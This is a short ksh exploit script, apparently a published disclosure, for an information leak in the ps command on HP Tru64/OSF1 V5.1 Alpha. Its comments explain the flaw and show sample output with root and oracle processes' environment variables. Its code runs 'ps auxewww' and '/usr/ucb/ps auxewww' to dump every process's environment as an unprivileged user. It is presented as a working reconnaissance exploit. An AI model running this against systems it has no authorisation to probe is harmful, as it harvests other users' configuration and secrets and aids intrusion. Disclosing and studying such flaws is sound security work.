#!/bin/ksh # # osf1tru64ps.ksh exploit # Tested on OSF1 V5.1 1885 alpha # # ps executable - information leak # # Author: Andrea "bunker" Purificato # http://rawlab.mindcreations.com # # the "ps" command (also /usr/ucb/ps) on HP OSF1 v5.1 Alpha, # developed without an eye to security, allows unprivileged users to see # values of all processes environment variables. # # Useful during information discovery. # # fake_uname> uname -a # OSF1 fake_uname V5.1 1885 alpha # # fake_uname> id # uid=301(fake_user) gid=216(fake_gid) # # fake_uname> /usr/ucb/ps auxeww # USER PID %CPU %MEM VSZ RSS TTY S STARTED TIME COMMAND # ... # ... # root 1038875 0.0 0.0 2.02M 184K ?? I 11:39:03 0:00.01 sleep 55 MANPATH=/usr/share/man:/usr/dt/share/man:/usr/local/man:/usr/opt/networker/man:/usr/local/openssh/bin PATH=/sbin:/bin:/usr/bin:/usr/sbin:/sbin:/bin:/usr/bin:/usr/sbin:/sbin:/usr/sbin:/usr/bin:/usr/ccs/bin:/usr/bin/X11:/usr/local:/usr/local/openssh/bin:/usr/opt/networker/bin LOGNAME=root USER=root SHELL=/bin/ksh HOME=/ TERM=vt100 PWD=/opt/AmosLite_Client... # ... # ... # root 1009950 0.0 0.0 2.73M 840K ?? I < Sep 30 0:31.22 /usr/sbin/auditd -l /LOG_SOURCE/audit/auditlog HOME=/ LOGNAME=root MANPATH=/usr/share/man:/usr/dt/share/man:/usr/local/man:/usr/opt/networker/man:/usr/local/openssh/bin PATH=/sbin:/usr/sbin:/usr/bin:/usr/ccs/bin:/usr/bin/X11:/usr/local:/usr/local/openssh/bin:/usr/opt/networker/bin PWD=/var/audit SHELL=/bin/ksh TERM=xterm USER=root... # ... # ... # oracle 541177 0.0 0.0 28.2M 3.4M ?? S Sep 01 0:07.00 /app/oracle/product/9.2.0/Apache/Apache/bin/httpd -d /app/oracle/product/9.2.0/Apache/Apache HOME=/app/oracle LD_LIBRARY_PATH=/app/oracle/product/9.2.0/lib:/app/oracle/product/9.2.0/lib:/app/oracle/product/9.2.0/obackup/lib: LOGNAME=oracle NLS_LANG=AMERICAN_AMERICA.WE8MSWIN1252 OBK_HOME=/app/oracle/product/9.2.0/obackup ORACLE_BACKUP=/app/oracle/BACKUP ORACLE_BASE=/app/oracle ORACLE_DOC=/app/oracle/product/9.2.0/oradoc ORACLE_HOME=/app/oracle/product/9.2.0 ORACLE_PATH=/app/oracle/product/9.2.0/oracle ORACLE_SID=... # ... # ... # echo "Tru64 Alpha OSF1 V5.1 1885 - ps information leak" echo "Andrea \"bunker\" Purificato - http://rawlab.mindcreations.com" echo "" echo "Default ps executable: " ps auxewww echo "/usr/ucb/ps executable: " /usr/ucb/ps auxewww